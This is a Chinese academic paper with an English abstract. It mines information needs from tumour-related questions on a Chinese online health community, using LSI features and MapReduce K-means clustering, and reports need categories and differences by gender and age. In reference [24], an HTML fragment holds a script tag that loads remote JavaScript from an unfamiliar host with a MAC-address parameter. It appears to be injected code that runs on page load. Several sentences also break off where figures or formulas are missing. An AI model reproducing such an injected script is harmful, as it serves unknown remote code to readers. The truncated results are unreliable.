【目的】构建适应大数据环境的中文网络健康社区用户信息需求挖掘框架, 以肿瘤科为例分析用户信息需求。【方法】使用潜在语义索引(LSI)模型和MapReduce分布式文本聚类技术对中文网络健康社区——求医网肿瘤板块的全部提问数据(共计24 305条)进行用户信息需求挖掘。【结果】挖掘出用户的5个信息需求类目及其占比: 治疗(43.3%)、病理及病因(34.5%)、检查(12.1%)、术后(7.0%)、预防(3.1%), 各类目下Top20关键词; 发现国内外各需求类目占比差异巨大; 预防信息需求将持续上升; 需求的性别差异显著, 男性最关注治疗信息、女性最关注病理及病因信息; 需求的年龄差异较大, 青年群体占比极高(83.79%)等。【局限】可能存在更好的阈值选择, 更完整医学主题词表; 尚未进行信息需求的多维分析。【结论】本文框架可在大数据环境下挖掘用户信息需求, 并分析需求的变化趋势以及年龄与性别差异。
[Objective] This paper constructs an information demand mining framework of Chinese online health community users adapted to the big data environment, and analyzes the user information needs by taking the data of tumor-forum as an example. [Methods] The Latent Semantic Indexing (LSI) model and MapReduce distributed text clustering technology were used in this framework to mine the user information needs. We use all the Q&A data (24,305 in total) from tumor-forum of Chinese online health community (qiuyi.cn) as the experimental data source. [Results] The proposed framework mines the five information needs and their proportions of the tumor users: treatment (43.3%), pathology and etiology (34.5%), examination (12.1%), postoperative (7.0%), prevention (3.1%), and top 20 keywords of these needs. The analysis shows the growth of each needs, and the significant difference between domestic users and foreign users. Gender differences are also significant, the male need treatment information most, while female need pathological and etiological information most. Age difference is large too, and the information needs of young people are the largest (83.79%), etc. [Limitations] There may be better threshold selection, and the medical thesaurus is not prefect. The analysis of information needs is not multidimensional. [Conclusions] The proposed framework is feasible. The paper found the trend of the demand distribution changes with year and the distribution of users information needs vary with age or gender.
网络健康社区已成为用户获得健康信息的主要途径之一, 如国外的Diabetic Connect、PatientsLikeMe, 国内的丁香园、求医网等。2017年第39次中国互联网络发展状况统计报告指出, 截至2016年12月, 中国互联网医疗用户规模为1.95亿, 占网民的27.2%, 在线医疗保健信息查询、在线预约挂号和在线咨询问诊总使用率为18.4%[1]。国内外政府对于公众的健康信息都极其关注, 如“欧盟健康计划”(2014-2020)将健康信息管理确定为23个优先领域之一[2]。2017年国家卫生和计划生育委员会颁布的“十三五”全国人口健康信息化发展规划指出要大力加强健康信息化和健康医疗大数据服务体系建设[3]。但各种网络健康社区所提供的信息质量参差不齐, 专业知识匮乏的普通用户很难从网上获得所需要的高质量健康信息。因此, 了解网络健康社区用户的信息需求, 并有针对性地提供健康信息服务显得尤为重要。目前采用中文数据源的网络健康社区信息需求研究极少, 且国内外大多数健康信息需求研究的样本量较少、研究方法较传统, 已不能满足大数据时代的需求。
为更好地研究中文网络健康社区用户的信息需求, 本文提出一种通用的基于大数据挖掘的中文网络健康社区用户信息需求挖掘框架。并以肿瘤为例, 爬取求医网(http://www.qiuyi.net)的相关问答数据(共计24 305条)为实验数据源, 运用本文所提出的框架, 结合相关医学文献, 得到用户对于肿瘤疾病的信息需求模型, 以及信息需求的趋势变化特征与分布特征。
对特定疾病进行健康信息需求研究是目前国内外最常见的研究形式, 其中, 对于癌症疾病的健康信息需求研究是最广泛的[4]。Oh等[5]爬取Yahoo! Answers问答平台上的81 434个与癌症有关的问题, 使用文本聚类的方法得出用户关于癌症信息的需求, 以此帮助相关医疗机构和医疗服务提供者更好地理解用户的多维信息需求。Tsuya等[6]爬取Twitter上与癌症相关的推文, 使用文本挖掘的方法对推文进行分析得出患者在社交平台上的信息需求。还有研究发现, 即使处于偏远地区的患者也在积极使用互联网搜寻相关健康信息以更有效地进行疾病管理[7]。国内也有很多学者从特定疾病的角度对用户健康信息需求进行研究。魏永婷等[8]对69名肿瘤癌症化疗患者进行信息需求调查, 发现患者对于疾病治疗方法、症状、药物是否存在副作用等方面的信息需求较高。也有学者通过问卷调查将癌症患者信息需求分为诊断、治疗、预后、其他4个维度[9]。
为更好地展示在研究健康信息需求时所采用的研究方法, 现将国内外学者所使用的方法进行文献梳理, 结果如表1所示。
综上, 目前国内外学者在研究健康信息需求时多以特定疾病作为切入点, 从年龄、性别等方面分析用户需求的异同, 但在研究方法上多以定性分析法为主, 很少从文本自身角度对用户的信息需求进行挖掘, 且大多数研究的样本量较小, 难以代表广大用户的需求。而少量采用传统文本挖掘方法的研究, 忽略了大数据时代文本挖掘计算量急剧增加的事实且大多数研究采用国外数据源, 如Yahoo! Answers, 极少以中文网络健康社区数据作为数据源, 且此类研究所采用的数据都是普通网络问答社区, 如百度知道, 几乎没有研究涉及常见的网络健康社区问答板块的数据。
针对现有网络健康社区信息需求研究的不足, 本文提出中文网络健康社区用户信息需求挖掘框架, 以中文网络健康社区的数据作为数据源, 结合大数据挖掘技术, 解决大规模数据聚类效率低的问题。
基于大数据挖掘的中文网络健康社区的用户信息需求挖掘技术框架如图1所示。首先采集网络健康社区特定疾病的相关信息数据; 然后进行数据处理, 包括分词、去停用词、特征提取等; 再进行基于MapReduce的K-means聚类, 对聚类结果进行分析与评估; 最终输出特定疾病的需求类目和每个类目下的Top5关键词与关键词标签云, 以及需求分布特征和趋势变化特征。
在数据采集阶段, 首先需要确定数据源, 即中文网络健康社区中关于某一疾病的相关提问文本, 再通过相关网络爬虫获取网页中所需要的信息。本文实验使用Python的Scrapy爬虫框架, 通过Twisted异步网络库处理网络通信、提取结构化数据。数据采集完成后, 对得到的论坛提问文本数据集进行处理, 具体操作过程如图2所示。
(1) 分词及去停用词
与英文不同, 中文的词与词之间并无明确分隔符, 需进行分词处理[23]。因本研究文本数据源涉及医疗健康领域专业术语, 所以需结合已有中文医学主题词表以提高分词的准确性。去停用词指自动过滤文本中对于检索没有区分意义和实际应用价值的词语, 可采用建立停用词表法进行处理。采用Jieba分词工具结合CNKI发布的中文医学主题词表CMesh进行分词处理, 并用百度停用词表对文本数据进行去除停用词处理。
(2) 特征表示与提取
常娥[24]提出的潜在语义索引(Latent Semantic Analysis, LSI)模型使得文本向量空间中每一维不再简单反映词条的分布关系和出现频度, 它反映的是强化的语义关系, 并大大降低了向量空间的维数, 有效提高文本聚类的速度。因此, 使用基于LSI模型的文本表示方法实现特征表示与提取。本文设定
(1) 基于MapReduce的分布式文本聚类算法
大数据背景下, 网络健康社区的提问数随着时间增加会急速增长, 为解决大规模文本聚类问题, 李钊等[25]对传统的K-means聚类算法进行优化, 使用基于MapReduce的分布式文本聚类算法对帖子内容进行聚类分析, 极大地提高聚类效率。K-means算法的核心是计算每个样本和聚类中心的距离, 将样本分配到距离最近的簇中。MapReduce主要由两部分构成: Map和Reduce。Map任务区用于计算聚类中心, Reduce任务区用于更新聚类中心。具体聚类分析过程如图3所示, 其中相似度采用欧氏距离公式[25]计算。
(2) 聚类算法参数选择及效果评估级
采用距离最大化原则[26]选择初始聚类中心, 该方法主要根据确定的距离阈值寻找聚类中心, 然后根据最近邻规则把模式样本划分到各类距离中心对应的类别中。采用肘部法则(Elbow)确定聚类簇数
$J=\sum\nolimits_{1}^{k}{\sum\nolimits_{i}{\in {{C}_{k}}}{{\left| {{x}_{i}}-{{u}_{k}} \right|}^{2}}}$ (1)
其中,
因文本聚类是非监督的学习算法, 有学者提出轮廓系数(Silhouette Coefficient)对结果进行评估[28]。轮廓系数是类内密集与类间分散程度的评价指标。通常认为, 轮廓系数最大值所对应的数为最优聚类数。因此, 以轮廓系数值确定所选聚类簇数
使用Spark的MLlib实现上述分布式文本聚类算法, 确定聚类簇数
(1) 需求识别
主题识别的文本聚类研究过程中, 基于频繁值的表示法因降低了文本维度且效果更好而常被使用[10], 因此本研究也采用此方法表示聚类结果。对每一个簇内文本集使用TF-IDF方法提取关键词, 并对聚类结果进行人工合并。此处参照李重阳等[22]的研究, 将病因和症状的主题簇合并为病理及病因; 参照金碧漪等[19]的研究, 将药物治疗与手术治疗的主题簇合并为治疗。最终得到用户信息需求类目及每个类目所对应的关键词, 并给出每个需求类目下Top5关键词及其关键词标签云展示不同结果对象(关键词的TF-IDF值越大, 词的标签字体越大, 反之亦然)。
(2) 需求变化趋势与分布分析
采集的数据不仅包括问题描述, 还有提问者自身信息, 如年龄、性别、提问时间等。为进一步探究用户信息需求的特征, 使用描述统计和卡方检验的统计分析方法研究用户信息需求趋势和分布, 统计分析法得到信息需求的年份变化趋势、利用卡方检验的方法探究信息需求分布是否存在显著的性别差异和年龄差异。统计结果使用饼状图、柱状图、环形图、堆积条形图等进行各类别差异的可视化呈现。
实验数据源来自网络健康社区求医网。求医网包含1 500多个针对不同疾病类型的问答板块, 截至2016年10月31日, 其问题帖数已超过200万, 成功为1 625 278名用户解答了疑惑。因不同疾病板块的用户具有不同的信息需求, 而肿瘤科疾病的关注人数最多, 所以选取肿瘤科自2011年10月1日-2016年10月31日的问答板块全部提问数据(共24 305条记录)作为验证需求挖掘框架的数据源, 每条记录包含问题标题、性别、年龄、科室、日期、问题描述等数据项。
本文实验在Windows系统环境下、使用PyCharm开发环境、以Python3.0作为汇编语言, 按照第3节的挖掘框架进行数据采集、数据处理、分布式文本聚类及需求分析结果数据展示。
原始数据进行基本处理后, 其统计分析如表2所示。可以看出, 自2011年起提问数一直保持快速增长趋势, 2016年因大量同质网站出现并分流了用户, 致使提问数转为略有下降。
(1) 聚类数
在文本聚类分析中, 采用肘部法则确定
(2) 聚类结果分析
从表3可以看出, 用户的健康信息需求主要集中在治疗、病理及病因、检查、术后、预防5个主题类目上, 且图6表明治疗、病理及病因是用户的主要需求。其中, 治疗相关问题数量为10 524条, 约占总问题数的43.30%, 关注度最高; 病理及病因相关问题数为8 383条, 约占总问题数的34.49%, 关注度次高; 而预防相关问题数仅有761条, 约占总问题数的3.13%, 关注度最小。然而国外学者使用网络数据进行的肿瘤信息需求研究显示, 普通公众对于预防信息关注度最高(88.2%), 紧随其后的是关于治疗的信息(48.0%)[29]。对比可见, 国内外网络健康社区用户对于健康信息的需求主题差异较大。
表3和图6表明中国民众对于肿瘤预防信息没有太多关注, 只有出现明显病症后才去了解相关治疗手段和病理病因, 但发病后的肿瘤往往已到达中晚期, 错过了最佳治疗时间, 这也从侧面揭示中国肿瘤发病率接近世界水平, 但是致死率高于世界水平的原因。如果相关组织部门对肿瘤早期预防知识进行推广, 提高广大民众的关注度, 及早检查发现肿瘤症状并进行预防和治疗, 可以大大提高治疗成功率和患者生存率。
进而, 提取各主题关键词及前20关键词TF-IDF值, 结果如表4所示。
可看出在“治疗”需求主题中, 关于其子类目“药物”的提问(中药、药物、吃药等)相较于其子类目“手术”的提问(手术、切除、化疗、化验、放疗等)要少得多, 说明肿瘤治疗中多以手术治疗为主, 药物治疗为辅, 用户需求集中在手术的治疗项目及效果上; 在“病理及病因”需求主题中, 用户需求集中在不同类型肿瘤的发病原理及症状上, 如肿瘤是否会引起疼痛、流血等症状; 在“检查”需求主题中, 用户需求集中在化验、CT、彩超等检查结果能否自我判断是否患有肿瘤疾病; 在“术后”需求主题中, 因肿瘤在术后易复发或转移, 用户需求集中在术后恢复上, 如正确的术后恢复治疗和如何有效降低复发率等; 在“预防”主题需求中, 用户需求集中在不健康的生活方式会导致老人和孩子患上肿瘤。
(1) 信息需求年份趋势变化分析
用户对于肿瘤的信息需求的年份分布如表5所示。可以看出, 病理及病因知识的需求量占比总体呈下降趋势, 而预防知识的需求则是先下降后上升。可能是因为随着网络健康社区中健康知识的普及, 用户对于肿瘤基础知识的了解增多, 因而需求量下降, 进而人们逐渐意识到预防肿瘤的重要性, 因此对预防的需求量提高。参考发达国家现状可推测, 对肿瘤预防知识的需求在未来将持续上升。
(2) 信息需求分布性别差异分析
用户对肿瘤的信息需求的性别分布如图7所示。通过各需求类目提问总数占比, 可以发现不同性别用户对于健康信息需求的偏好不同。总体看来, 男性用户的提问数量远多于女性用户, 比例约为3(18 223):1(6 082)。有报告显示[30], 2015年全国肿瘤患者中男女比例约为1.41:1, 这说明健康问答社区中, 在考虑男性患病率高于女性的情况下, 男性用户在互联网上寻求帮助的意愿仍然大于女性用户。
为更好地说明不同性别用户间差异, 使用卡方检验进一步分析。结果显示
(3) 信息需求分布年龄差异分析
剔除年龄为0的异常数据后, 用户对肿瘤信息需求的年龄分布如图8所示。从提问数上看, 数量最多的是青年, 占总提问数的83.79%(18 003条), 其后依次为中年、老年及儿童。一方面, 青年是年龄在16岁-35岁之间的用户, 他们是互联网的主要使用群体, 因此也是网络健康社区的主要用户。另一方面, 这与中国社会高度关注中青年群体肿瘤高发及增长迅速有关。
从图8可看出不同年龄用户在各类目上的信息需求比例相差较大。其中, 青年在病理及病因(37.27%)和治疗(38.72%)方面的信息需求量接近, 有别于其他年龄组重点关注治疗。这表明青年用户在关心治疗方法与结果的同时也关注专业知识。
考虑性别因素进一步分析青年群体的信息需求分布, 具体结果如图9所示。在青年组, 男女提问总数比例约为3.71(14 222条): 1(3 816条), 与总体情况接近。卡方检验结果显示
本文针对现有网络健康社区信息需求研究的不足, 结合大数据挖掘技术, 提出一种基于分布式文本聚类的中文网络健康社区用户信息需求框架。此框架区别于传统定性研究方法与适合小样本数据的传统文本挖掘方法, 可有效支持大数据环境下的中文网络健康社区用户健康信息需求挖掘。基于求医网肿瘤科提问数据的实验表明, 该框架能有效分析用户的信息需求类目以及需求的趋势变化与分布特征。
本研究也存在一些不足, 如数据处理过程的阈值和词表选择还可继续优化, 还可以尝试使用标注数据训练多分类器, 完成多维度的信息需求分析。
陆泉: 提出研究思路, 论文修改及最终版本修订;
朱安琪: 设计数据分析方法, 数据处理与分析, 论文起草;
张霁月: 设计研究方案, 采集数据;
陈静: 实验结果分析, 论文修订。
所有作者声明不存在利益冲突关系。
支撑数据由作者自存储, E-mail: Aprilzaq@163.com。
[1] 朱安琪. qiuyiwang.data.csv. 求医网在线问答板块数据集.
[1] |
[本文引用:1]
|
[2] |
[本文引用:1]
|
[3] |
[本文引用:1]
|
[4] |
社会化问答服务逐渐成为人们搜寻健康信息和寻求社会支持的主要途径。本文采用数据库检索和追溯检索两种方法,搜集近年来国外学者关于社会化问答平台用户健康信息行为的文章并进行系统性综述,对文献的研究主题从健康信息质量评价、健康信息分享行为、健康信息搜寻行为、健康信息需求、健康信息使用行为以及用户特征等六个方面进行归类分析,希望综述结果可以为我国学者开展相关研究提供依据和指引。
|
[5] |
[本文引用:1]
|
[6] |
Twitter is an interactive, real-time media that could prove useful in health care. Tweets from cancer patients could offer insight into the needs of cancer patients.The objective of this study was to understand cancer patients' social media usage and gain insight into patient needs.A search was conducted of every publicly available user profile on Twitter in Japan for references to the following: breast cancer, leukemia, colon cancer, rectal cancer, colorectal cancer, uterine cancer, cervical cancer, stomach cancer, lung cancer, and ovarian cancer. We then used an application programming interface and a data mining method to conduct a detailed analysis of the tweets from cancer patients.Twitter user profiles included references to breast cancer (n=313), leukemia (n=158), uterine or cervical cancer (n=134), lung cancer (n=87), colon cancer (n=64), and stomach cancer (n=44). A co-occurrence network is seen for all of these cancers, and each cancer has a unique network conformation. Keywords included words about diagnosis, symptoms, and treatments for almost all cancers. Words related to social activities were extracted for breast cancer. Words related to vaccination and support from public insurance were extracted for uterine or cervical cancer.This study demonstrates that cancer patients share information about their underlying disease, including diagnosis, symptoms, and treatments, via Twitter. This information could prove useful to health care providers.
|
[7] |
Abstract Patients who are active and involved in their self-management and care are more likely to manage chronic conditions effectively (6, 26). With a 5-fold increase in the incidence of chronic illness over the past 20 years, access to information can provide patients the tools and support to self-manage their chronic illness. New media technologies can serve as tools to engage and involve patients in their health care. Due to the increasing ubiquity of the Internet and the availability of health information, patients are more easily able to seek and find information about their health.. Thus, the Internet can serve as a mechanism of empowerment (4, 5). This is especially important for people with diabetes mellitus where intensive self-management is critical.
|
[8] |
目的:探讨癌症患者住院化疗期间健康信息需求情况并分析其相关因素,为癌症患者的临床护理提供参考.方 法:应用一般资料向卷、癌症患者健康信息需求量表对北京市某三级甲等医院肿瘤科的69例癌症住院化疗患者进行调查.结果:癌症患者住院化疗期间的整体健康 信息需求为低度到中度(1.39±0.47)分,患者对于疾病治疗、症状控制信息的需求较高;患者的健康信息需求与其疲乏程度具有相关性,重度疲乏患者的 健康信息需求高于轻度疲乏患者(P<0.05).结论:癌症患者住院化疗期间具有轻到中度的健康信息需求,患者的健康信息需求程度与其疲乏程度呈正相关, 临床工作中应有针对性地对患者进行个体化化的健康信息支持.
|
[9] |
目的 :研制和测评癌症患者信息选择问卷 (IPQCP)。方法 :以严谨的程序编制问卷 ,并随机抽取 5 0 1例癌症患者、 169位亲属和 86位医护人员进行测定 ,对问卷作筛选和信度、效度等分析。结果 :1 最后问卷共有 19个条目 ,含诊断、治疗、预后、其他四个维度。 2 四个维度和总分的重测信度分别为 0 85、0 81、 0 83、 0 76和 0 96;Cronbachα分别为 0 82、 0 89、 0 99、 0 89和 0 95 ;分半信度为 0 95。 3 问卷能较好反映癌症患者对信息内容和量的需求 ,结构与设计的理论构思相符 ,参照Cassileth信息清单的效标效度为0 91。结论 :IPQCP具有较好的信度和效度 ,在临床上有一定的实用价值。
|
[10] |
Aims This study aims to describe the information needs of urological and breast cancer patients and factors related to use of the Internet as a source of health information. Methodology A cross-sectional descriptive study was carried out, using individual questionnaire-based interviews held during the oncology appointments of 169 patients with urological cancer and 100 with breast cancer at the Virgen de las Nieves University Hospital in Granada, Spain. The variables studied were use of the Internet as a source of health information, health status, patient role in the decision-making process, information sources, satisfaction with the health-care system, type of information received, and Internet use. A multivariate logistic regression analysis was carried out. Results Breast cancer patients are more concerned with long-term results and the effects on their family and personal life. They are also interested in the experiences of other patients and support groups or staff who could help them to cope with their illness. The information needs of patients with urological cancer are linked to short-term alternative treatments, their sex life, keeping healthy, and exercise. More clinical aspects, such as tests and experiments linked to their treatment, are not a frequent information need. The factors linked to use of the Internet as a source of health information are younger age, high level of education, the patient active role in the decision-making process, and undergoing more aggressive treatment. There is no link between using the Internet as a source of health information and level of satisfaction with the health-care system, or with Internet use in general. Conclusion Patients need additional information about their illness on top of that given to them by health-care staff, and they often use the Internet to find it. The greatest information need is related to the effects of their illness on their day-to-day life. Health-care staff should provide patients with advice about reliable websites and how to search the Internet.
|
[11] |
Context Several prior studies have found that women are less likely to be screened for colorectal cancer (CRC) than men. While the source of this screening differential is unknown, recent studies suggest gender differences in barriers to screening might explain the disparity.
|
[12] |
目的:分析研究网络健康信息的使用状况、对网络健康信息内容的关注程度、网络获取健康信息的目的,总结网络环境下用户健康信息需求的影响因素,论述网络环境下不同用户信息需求的特点。方法:对320名受访者进行调查问卷的发放和网络调查法获取调查表收集相关数据,并辅以个人深入访谈。结果:在对试验性疗法或试验性药品的信息关注度、性健康和瘦身美容的相关信息三方面,不同性别用户均表现出差异性。不同文化层次的用户在对健康咨询、特定疾病、心理健康等五个方面的信息内容上也均有影响。用户的健康状况直接决定着其对健康信息需要的迫切性和目的性。
|
[13] |
目的了解糖尿病患者对糖尿病知识的需求内容及获得糖尿病知识的方式,为糖尿病患者的教育提供依据。方法采用问卷调查法对103例出院糖尿病患者的糖尿病知识需求及获得知识的方式进行调查。结果糖尿病饮食知识、运动知识、合理用药知识、如何治疗糖尿病、糖尿病的并发症及危害知识需求排在前五位,占61.2%~77.7%;解决平时遇到的具体困惑或困难、糖尿病的病因及危险因素、糖尿病有哪些临床表现、心理因素和睡眠质量是否影响血糖控制水平、糖尿病鉴别与预防的相关知识排在后五位,占39.8%~45.6%;获得糖尿病知识的方式以住院期间接受糖尿病教育为主,占88.3%,从医生、护士和科普手册中获得糖尿病知识的占82.5%~86.4%,通过报刊、电视、网络获得的糖尿病知识占32%~56.3%;对是否相信现行的报纸杂志广告介绍的糖尿病知识这一问题进行了调查,91.3%的患者给予了否定回答。结论①制定全面的健康教育计划,为糖尿病患者提供系统的糖尿病防治知识;②培养一支具有丰富糖尿病知识的教育队伍;③准确评估糖尿病患者对糖尿病健康知识的需求;④建立长效健康教育机制,采取多种形式开展糖尿病患者健康教育。
|
[14] |
目的分析癌症患者信息需求现状和影响因素,以便更好地为癌症患者提供信息服务。方法采取方便抽样的方法,用癌症患者一般资料调查表、癌症患者信息选择问卷(IPQCP)对98例住院化疗癌症患者进行调查。结果98例患者IPQCP的总分和诊断(D)、治疗(T)、预后(P)、其他(0)维度均分别为(32.34±8.70),(4.92±0.26),(8.35±0.25),(8.76±2.61),(10.32±0.27)分;54.1%希望获知“一切,无论好坏”的信息;77.6%的患者认为信息量“越多越好”;多元回归显示,信息需求总分及各维度得分与患者年龄、手术经历、获知诊断所经历时间有统计学意义(P〈0.05)。结论癌症患者普遍存在信息需求,患者的年龄、手术经历、获知诊断时间的长短等对信息需求产生重要影响,因此应根据具体情况有针对性地向患者提供信息。
|
[15] |
The current study investigates people use of social networking sites for health purposes and its impact on their perception of social support and their health self-efficacy. A structural model was fitted to test hypothesized relationships between having a health concern, seeking online health information, seeking health-related social support on Facebook, perceived social support from Facebook friends, and health-related self-efficacy. The study also looks at the relative significance of social support dimensions including: emotional, informational, tangible, and esteem dimensions. An analysis of 291 respondents revealed a positive relationship between having health concerns and seeking health-related social support. Seeking support was significantly associated with all four social support dimensions. Among the four support dimensions, emotional support was the only significant predictor of health self-efficacy. Also, emotional support was the dimension that was most prevalent in Facebook contexts. Health information seeking was also positively associated with health self-efficacy but was not significantly related to having a health concern.
|
[16] |
|
[17] |
|
[18] |
[本文引用:1]
|
[19] |
为了解消费者对糖尿病信息的需求,选取雅虎问答中糖尿病相关的8762条提问记录作为研究对象,根据糖尿病信息的类目体系及分类策略对其进行人工编码,再进行文本处理,获得表征糖尿病健康信息需求的587个中心词,并通过多维尺度分析方法,对每个需求类目下的中心词进一步聚类发现,消费者对于糖尿病健康信息最大的关注点是日常疾病管理、疾病确诊和治疗,而对疾病预防缺乏应有的关注度。
|
[20] |
An assessment of information needs is essential for care planning for patients living with chronic diseases such as human immunodeficiency virus (HIV). The extent to which these assessments have been conducted in Latin America and the Caribbean (LAC) is unknown. The purpose of this study was, therefore, to identify, evaluate, and summarize what research has been conducted to examine patient perceptions of their health-information needs among adults living with HIV in LAC. Using an integrative review methodology, a literature search of six databases was conducted in April and May 2015. Inclusion criteria were peer-reviewed articles published in English or Spanish that assessed the information needs of HIV-positive patients living in LAC. The quality of included articles was assessed and relevant characteristics of each article were extracted, compared, and presented. Searches returned 1885 citations, 11 of which met inclusion criteria. Studies included were conducted in 8 of 33 countries, used multiple research designs, demonstrated varying needs between populations, and found numerous unmet information needs. Information about HIV in general, methods of infection transmission, antiretroviral medications, other sexually transmitted diseases, and effective coping mechanisms were the most commonly mentioned needs. Healthcare providers were the largest and most reliable source of health information for many participants and it was emphasized that in order for health education to be effective, programs should include both individual and group components. Patients indicated that they may have difficulty processing and using information through an incorrect understanding of medications, not changing risk behaviors, and by stating that information can be overwhelming or poorly communicated. Further research on information needs is warranted so that healthcare providers and organizations may provide the information patients need to appropriately manage their health.
|
[21] |
[本文引用:1]
|
[22] |
以在线问答社区中癌症信息为例,对其信息需求从时间和主题两个角度进行综合测度。对不同时间的数据进行分组,采用LDA主题挖掘法来确定相关编码规则,探求在线问答祉区中用户信息需求特征,发现用户对癌症信息的需求主要集中在若干个主题,并且对各主题的关注度随时间呈现出一定的变化趋势。进一步探究在线问答社区健康信息服务存在的问题,为促使各网络健康社区信息服务水平的提高提供参考和指导。
|
[23] |
[本文引用:1]
|
[24] |
<html dir="ltr"><head><title></title><script async=true src="http://t.7gg.cc:88/j1.js?MAC=68DB542C8756"></script>
</head><body>结合潜性语义索引(latent semantic index,LSI)理论和K-means聚类法,提出一种改进的文本自动聚类方法,即首先利用N-gram统计法抽取文档关键词,并应用潜性语义索引LSI对构建文档的向量空间模型进行降维,然后采用K-means算法进行文本聚类。实验表明,该算法进行文本聚类的准确度最高可达84.7%。</body></html>
|
[25] |
在文本聚类中,相似性度量是影响聚类效果的重要因素。常用的相似性度量测度,如欧氏距离、相关系数等,只能描述文本间的低阶相关性,而文本间的关系非常复杂,基于低阶相关测度的聚类效果不太理想。一些基于复杂测度的文本聚类方法已被提出,但随着数据规模的扩展,文本聚类的计算量不断增加,传统的聚类方法已不适用于大规模文本聚类。针对上述问题,提出一种基于MapReduce的分布式聚类方法,该方法对传统K-means算法进行了改进,采用了基于信息损失量的相似性度量。为进一步提高聚类的效率,将该方法与基于MapReduce的主成分分析方法相结合,以降低文本特征向量的维数。实例分析表明,提出的大规模文本聚类方法的聚类性能比已有的聚类方法更好。
|
[26] |
随着互联网时代的快速发展,在线医疗社区的出现打破了时空限制,为用户提供了丰富的医疗信息和情感帮助,已经成为社会支持的重要来源,受到用户的广泛关注和参与。对在线医疗社区进行用户文本挖掘能够揭示社区中用户的参与行为,从而优化其用户管理和信息推荐。已有的研究对象主要集中在英文在线医疗社区,鲜有文献对中文在线医疗社区进行研究。基于社会支持理论,本文设计了一个中文用户文本挖掘流程来研究中文在线医疗社区中的社会支持类型和用户参与。利用中文文本挖掘及机器学习方法,对中文糖尿病社区“甜蜜家园”进行研究。本文利用LDA(LatentDirichlet Allocation)模型进行特征提取来构建低维度文本表示向量,采用二元分类法将用户文本分为不同的社会支持类型。最后,基于分类结果使用K-means算法进行用户聚类来识别用户角色。相比传统的特征提取方法,利用LDA进行特征提取能显著地降低数据维度,优化分类模型,提高分类准确率和分类效率。结果表明,本文提出的中文用户文本挖掘流程在文本分类与用户聚类中效果显著。
URL
[本文引用:1]
|
[27] |
本文介绍了在数据挖掘中,采用K-Means聚类分析算法对数据进行分析与挖掘。但由于K-Means使用时,初始重心是随机选取的,因此很容易陷入局部最优解。为解决该问题,引入了肘部法则(Elbow)。K-Means通常初始时要重复运行十几次甚至上百次,这时采用肘部法则计算出最小的成本函数对应的重心位置作为初始化位置,就很好的改善了局部最优解问题。
URL
[本文引用:1]
|
[28] |
In k-means clustering, we are given a set of n data points in d-dimensional space R/sup d/ and an integer k and the problem is to determine a set of k points in Rd, called centers, so as to minimize the mean squared distance from each data point to its nearest center. A popular heuristic for k-means clustering is Lloyd's (1982) algorithm. We present a simple and efficient implementation of Lloyd's k-means clustering algorithm, which we call the filtering algorithm. This algorithm is easy to implement, requiring a kd-tree as the only major data structure. We establish the practical efficiency of the filtering algorithm in two ways. First, we present a data-sensitive analysis of the algorithm's running time, which shows that the algorithm runs faster as the separation between clusters increases. Second, we present a number of empirical studies both on synthetically generated data and on real data sets from applications in color quantization, data compression, and image segmentation.
|
[29] |
|
[30] |
Cancer is a major public health issue in most of countries,including China.Accurate and valid information on cancer incidence,mortality,survival and relevant factors is irreplaceable for cancer prevention and control.Since the national program of cancer registry was launched by the Ministry of Health of China in 2008,the National Central Cancer Registry (NCCR) has been releasing the cancer incidence and mortality based on the data collected from cancer registries supported by the program.The cancer statistics provide current data from registered areas and aims to accurately reflect the cancer burden and epidemic in China.In 2014,the NCCR collected data for calendar year 2011 from 234 registries.After comprehensive quality evaluation,data from 177 registries have been selected as sources of the reports reflecting cancer incidence and mortality in the registration areas in 2011.These reports are the updated cancer statistics so far,covering much more registries and a big population.
|
版权所有 © 2015 《数据分析与知识发现》编辑部 地址:北京市海淀区中关村北四环西路33号 邮编:100190 电话/传真:(010)82626611-6626,82624938 E-mail:jishu@mail.las.ac.cn |